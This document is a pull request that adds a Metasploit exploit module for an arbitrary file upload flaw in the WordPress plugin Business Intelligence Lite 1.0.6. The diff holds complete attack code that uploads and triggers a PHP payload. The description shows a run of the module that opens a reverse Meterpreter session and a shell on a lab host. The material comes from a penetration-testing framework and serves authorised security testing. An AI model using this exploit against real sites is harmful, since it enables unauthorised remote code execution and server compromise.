### PR TITLE
Add WordPress Business Intelligence File Upload

### DIFF
--- a/modules/exploits/unix/webapp/wp_business_intelligence_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_business_intelligence_file_upload.rb
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Wordpress Business Intelligence Lite File Upload',
+      'Description'    => %q{
+          The Wordpress Business Intelligence Lite plugin contains an file upload
+          vulnerability. We can upload arbitrary files to the upload folder, because
+          the plugin also uses it's own file upload mechanism instead of the wordpress
+          api it's possible to upload any file type.
+      },
+      'Author'         =>
+        [
+          'Manish Kishan Tanwar', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['WPVDB', '7200'],
+          ['URL', 'http://packetstormsecurity.com/files/125927/']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['WP Business Intelligence Lite 1.0.6', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Mar 31 2014')) # Secunia?
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-business-intelligence-lite', '1.1')
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to upload payload")
+    filename = "#{rand_text_alpha_lower(6)}.php"
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(wordpress_url_plugins, 'wp-business-intelligence-lite', 'resources', 'open-flash-chart', 'php-ofc-library', 'ofc_upload_image.php'),
+      'ctype'    => 'text/plain',
+      'vars_get' => {
+        'name'   => "#{filename}"
+      },
+      'data' => payload.encoded
+    )
+
+    if res
+      if res.code == 200
+        register_files_for_cleanup(filename)
+      else
+        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
+      end
+    else
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
+    print_status("#{peer} - Calling uploaded file #{filename}")
+    send_request_cgi(
+      { 'uri'    => normalize_uri(wordpress_url_plugins, 'wp-business-intelligence-lite', 'resources', 'open-flash-chart', 'tmp-upload-images', filename) },
+      5
+    )
+  end
+end


### PR DESCRIPTION
#### Add Wordpress Plugin WP Business Intelligence Lite File Read Vulnerability.

  Application: Wordpress Plugin 'WP Business Intelligence Lite' 1.0.6
  Homepage: https://wordpress.org/plugins/wp-business-intelligence-lite/
  Source Code: https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.0.6.zip
  References: https://wpvulndb.com/vulnerabilities/7200
#### Vulnerable packages*

  1.0.6
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_business_intelligence_file_upload 
msf exploit(wp_business_intelligence_file_upload) > show options 

Module options (exploit/unix/webapp/wp_business_intelligence_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WP Business Intelligence Lite 1.0.6


msf exploit(wp_business_intelligence_file_upload) > info

       Name: Wordpress Business Intelligence Lite File Upload
     Module: exploit/unix/webapp/wp_business_intelligence_file_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-03-31

Provided by:
  Manish Kishan Tanwar
  Roberto Soares Espreto <robertoespreto@gmail.com>

Available targets:
  Id  Name
  --  ----
  0   WP Business Intelligence lite 1.0.6

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The Wordpress Business Intelligence Lite plugin contains an file 
  upload vulnerability. We can upload arbitrary files to the upload 
  folder, because the plugin also uses it's own file upload mechanism 
  instead of the wordpress api it's possible to upload any file type.

References:
  https://wpvulndb.com/vulnerabilities/7200
  http://packetstormsecurity.com/files/125927/

msf exploit(wp_business_intelligence_file_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_business_intelligence_file_upload) > check
[*] 192.168.1.31:80 - The target appears to be vulnerable.
msf exploit(wp_business_intelligence_file_upload) > exploit 

[*] Started reverse handler on 192.168.1.37:4444 
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file xrhzqm.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.37:4444 -> 192.168.1.31:51984) at 2015-04-26 01:21:09 -0300
[+] Deleted xrhzqm.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 11005 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
